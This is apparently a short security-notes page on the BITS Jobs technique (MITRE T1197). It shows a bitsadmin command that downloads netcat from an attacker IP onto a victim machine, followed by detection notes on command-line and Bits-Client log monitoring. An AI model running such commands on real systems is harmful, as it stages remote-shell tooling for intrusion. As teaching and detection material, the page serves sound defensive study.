Skip to content

Latest commit

 

History

History
30 lines (18 loc) · 717 Bytes

File metadata and controls

30 lines (18 loc) · 717 Bytes
description
File upload to the compromised system.

BITS Jobs

Execution

{% code title="attacker@victim" %}

bitsadmin /transfer myjob /download /priority high http://10.0.0.5/nc64.exe c:\temp\nc.exe

{% endcode %}

Observations

Commandline arguments monitoring can help discover bitsadmin usage:

Application Logs > Microsoft > Windows > Bits-Client > Operational shows logs related to jobs, which you may want to monitor as well. An example of one of the jobs:

References

{% embed url="https://attack.mitre.org/wiki/Technique/T1197" %}